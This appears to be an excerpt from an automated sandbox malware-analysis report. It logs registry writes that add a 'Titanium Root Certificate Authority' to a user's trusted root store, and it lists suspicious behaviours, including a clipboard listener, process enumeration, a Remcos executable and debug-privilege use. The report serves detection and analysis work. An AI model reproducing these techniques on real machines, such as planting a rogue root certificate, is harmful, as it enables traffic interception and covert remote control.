Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380038003700450038003400360044002d0036004200440039002d0034003100440033002d0038003200390042002d004500420044003000300045003700320035003600420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380030004600390044003800310033002d0030004600460036002d0034003000340032002d0039003100360046002d003100390034004300340036003900360043004300420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00330045003700370034004400380036002d0045003900330033002d0034004400370037002d0041003500360043002d004100300039004300390041004500350036004500330035007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380038003700450038003400360044002d0036004200440039002d0034003100440033002d0038003200390042002d004500420044003000300045003700320035003600420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00330045003700370034004400380036002d0045003900330033002d0034004400370037002d0041003500360043002d004100300039004300390041004500350036004500330035007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340030003900380043004100410032002d0042004600420031002d0034004400360032002d0038003900350043002d004600410031003700300036004200410042003300460037007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380034004300360039003200390045002d0044003100450043002d0034004500310043002d0038003700460035002d003100330034003000440044003200460035004500390036007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
